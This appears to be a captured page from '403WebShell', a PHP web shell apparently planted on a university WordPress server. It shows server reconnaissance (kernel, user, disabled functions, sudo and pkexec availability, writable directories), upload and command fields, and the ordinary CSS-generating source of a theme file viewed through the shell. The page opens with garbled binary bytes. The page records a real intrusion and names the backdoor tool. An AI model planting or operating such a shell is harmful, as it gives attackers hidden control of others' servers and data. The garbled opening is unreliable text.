h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/openness/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/openness/inc//inline-styles.php
<?php
/**
 * Add inline styles to the head area
 * @package Openness
*/
 
 // Dynamic styles
function openness_inline_styles($openness_custom) {
	
// BEGIN CUSTOM CSS	

// sidebar colours
	$openness_sidebar_bg = get_theme_mod( 'openness_sidebar_bg', '#ffffff' );
	$openness_site_title = get_theme_mod( 'openness_site_title', '#000' );
	$openness_site_description = get_theme_mod( 'openness_site_description', '#9d9d9d' );
	$openness_menu_colour = get_theme_mod( 'openness_menu_colour', '#333' );
	$openness_menu_description_colour = get_theme_mod( 'openness_menu_description_colour', '#9d9d9d' );
	$openness_menu_border_colour = get_theme_mod( 'openness_menu_border_colour', '#eaeaea' );
	$openness_social_icons = get_theme_mod( 'openness_social_icons', '#b1ae29' );
	$openness_sidebar_widget_titles = get_theme_mod( 'openness_sidebar_widget_titles', '#333' );
	$openness_sidebar_column_text = get_theme_mod( 'openness_sidebar_column_text', '#9d9d9d' );
	$openness_recent_posts_link = get_theme_mod( 'openness_recent_posts_link', '#333' );
	$openness_custom .= "body:before {background-color:" . esc_attr($openness_sidebar_bg) . "}
	.site-title a, .site-title a:visited { color: " . esc_attr($openness_site_title) . ";}
	.site-description { color: " . esc_attr($openness_site_description) . ";}
	.main-navigation a, .main-navigation a:visited { color: " . esc_attr($openness_menu_colour) . ";}
	.main-navigation .menu-item-description { color: " . esc_attr($openness_menu_description_colour) . ";}
	.main-navigation li  { border-color: " . esc_attr($openness_menu_border_colour) . ";} 	
	.social-navigation a:before { color: " . esc_attr($openness_social_icons) . ";}	
	.secondary .widget-title { color: " . esc_attr($openness_sidebar_widget_titles) . ";}
	.secondary .widget, .secondary .widget li a, .secondary .widget li a:visited { color: " . esc_attr($openness_sidebar_column_text) . ";}
	.secondary .widget.widget_openness-recent-posts h4 a	{ color: " . esc_attr($openness_recent_posts_link) . ";}
	@media screen and (min-width: 38.75em) {
	.main-navigation ul { border-color: " . esc_attr($openness_menu_border_colour) . ";}
	} "."\n";

// main content colours
	$openness_body_text = get_theme_mod( 'openness_body_text', '#737373' );
	$openness_link_colour = get_theme_mod( 'openness_link_colour', '#b1ae29' );
	$openness_heading_titles = get_theme_mod( 'openness_heading_titles', '#333' );
	$openness_entry_title_hover = get_theme_mod( 'openness_entry_title_hover', '#b1ae29' );	
	$openness_meta_info = get_theme_mod( 'openness_meta_info', '#9d9d9d' );
	$openness_footer_line = get_theme_mod( 'openness_footer_line', '#eaeaea' );
	$openness_footer_text = get_theme_mod( 'openness_footer_text', '#9d9d9d' );
	$openness_caption_text = get_theme_mod( 'openness_caption_text', '#a5a21d' );
	$openness_more_link_bg = get_theme_mod( 'openness_more_link_bg', '#b1ae29' );
	$openness_more_link = get_theme_mod( 'openness_more_link', '#fff' );
	$openness_post_tag_bg = get_theme_mod( 'openness_post_tag_bg', '#b1ae29' );
	$openness_post_tag_text = get_theme_mod( 'openness_post_tag_text', '#fff' );	
	$openness_custom .= "body {color:" . esc_attr($openness_body_text) . "}
	a, a:visited {color:" . esc_attr($openness_link_colour) . "}
	p a.more-link, p a.more-link:visited {background-color:" . esc_attr($openness_more_link_bg) . "; color:" . esc_attr($openness_more_link) . "}
	h1, h2, h3, h4, h5, h6, .entry-title a, .entry-title a:visited, .comment-author {color:" . esc_attr($openness_heading_titles) . "}
	.entry-title a:hover {color:" . esc_attr($openness_entry_title_hover) . "}
	.entry-meta, .entry-meta a, .entry-meta a:visited, .comment-metadata a, .pingback .edit-link a {color:" . esc_attr($openness_meta_info) . "}	
	.site-footer, .single .hentry, .comments-list li:last-child {border-color:" . esc_attr($openness_footer_line) . "}	
	.site-info, .site-info a, .site-info a:visited {color:" . esc_attr($openness_footer_text) . "}
	.gallery-caption, .wp-caption-text {color:" . esc_attr($openness_caption_text) . "}
	.tag-list a, .tag-list a:visited {background-color:" . esc_attr($openness_post_tag_bg) . "; color:" . esc_attr($openness_post_tag_text) . "}	"."\n";	
	
// form elements
	$openness_button_bg = get_theme_mod( 'openness_button_bg', '#b1ae29' );
	$openness_button_label = get_theme_mod( 'openness_button_label', '#fff' );
	$openness_custom .= "button, input[type=button], input[type=reset], input[type=submit], .prev-image a,.next-image a, .prev-image a:focus,.prev-image a:hover,.next-image a:focus, .next-image a:hover {background-color:" . esc_attr($openness_post_tag_bg) . "; color:" . esc_attr($openness_post_tag_text) . "}
	"."\n";	
	
// center our post summary is using excerpts
	if( esc_attr(get_theme_mod( 'openness_use_excerpt', false ) ) ) :
	$openness_custom .= ".blog-standard .hentry {text-align:center;}"."\n";
	endif;
	
// Drop cap
	if( esc_attr(get_theme_mod( 'openness_show_dropcap', true ) ) ) :
		$openness_dropcap_colour = get_theme_mod( 'openness_dropcap_colour', '#333' );
		$openness_custom .= ".single-post .entry-content > p:first-of-type::first-letter {color:" . esc_attr($openness_dropcap_colour) . ";
		font-weight: 700;
		font-style: normal;
		font-family: \"Times New Roman\", Times, serif;
		font-size: 6rem;
		font-weight: normal;
		line-height: 0.8;
		float: left;
		margin: 6px 0 0;
		padding-right: 8px;
		text-transform: uppercase;
	}
	.single-post .entry-content h2 ~ p:first-of-type::first-letter {
		font-size: initial;	
		font-weight: initial;	
		line-height: initial; 
		float: initial;	
		margin-bottom: initial;	
		padding-right: initial;	
		text-transform: initial;
	}	"."\n";
	endif;


	
// END CUSTOM CSS

//Output all the styles
	wp_add_inline_style( 'openness-style', $openness_custom );	
}
add_action( 'wp_enqueue_scripts', 'openness_inline_styles' );	

Youez - 2016 - github.com/yon3zu
LinuXploit